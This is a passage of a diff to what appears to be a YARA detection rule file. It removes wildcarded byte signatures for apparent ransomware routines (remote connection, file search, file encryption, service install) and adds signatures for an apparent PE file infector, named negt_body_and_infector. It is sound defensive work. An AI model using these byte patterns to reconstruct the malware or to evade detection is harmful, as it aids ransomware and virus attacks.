-            ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ??
-            ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ??
-            89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC
-            ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ??
-            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ??
-            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8
-            ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89
-            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89
-            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ??
-            ?? ?? 90 8B 5D ?? C9 C2
-        }
-		$remote_connection_2 = {
-            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
-            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
-            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
-            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
-            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
-            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2
-        }
-		$encrypt_files_3 = {
-            55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ??
-            8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF
-            15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ??
-            ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ??
-            83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85
-            C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ??
-            83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-            E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ??
-            ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89
-            44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ??
-            89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89
-            5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85
-            C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89
-            6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B
-            7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ??
-            ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ??
-            85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB
-        }
-		$encrypt_files_4 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ??
-            ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ??
-            39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC
-            ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7
-            04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 04 24 FF 15
-        }
-		$search_files_3 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83
-            EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ??
-            ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ??
-            8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B
-            1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C
-            24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88
-            ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F
-            B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-            E8
-        }
-		$install_service = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0
-            89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ??
-            ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC
-            ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89
-            1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ??
-            5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83
-            EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ??
-            83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ??
-            81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15
-            ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B
-            44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9
+		$negt_body_and_infector_1 = {
+            6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00
+            3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8
+            FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE
+            FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ??
+            ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ??
+            56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D
+            85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8
+            50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00
+            00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D
         }
-		$encrypt_files_5 = {
-            FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF
-            15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89
-            14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24
-            ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89
-            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ??
-            89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC
-            ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24
-            ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
-            24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24
-            ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24
-            E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24
-            ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F
-            94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
-            ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24
-            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15
+		$negt_body_and_infector_2 = {
+            EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15
+            07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85
+            EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF
+            FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF
+            FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75
+            08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A
+            04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68
+            ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68
+            ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ??
+            ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ??
+            03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7
         }
-		$search_files_4 = {
-            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
-            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
-            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
-            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ??
-            ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ??
-            89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ??
-            ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2
+		$negt_body_and_infector_3 = {
+            05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7
+            05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ??
+            ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04
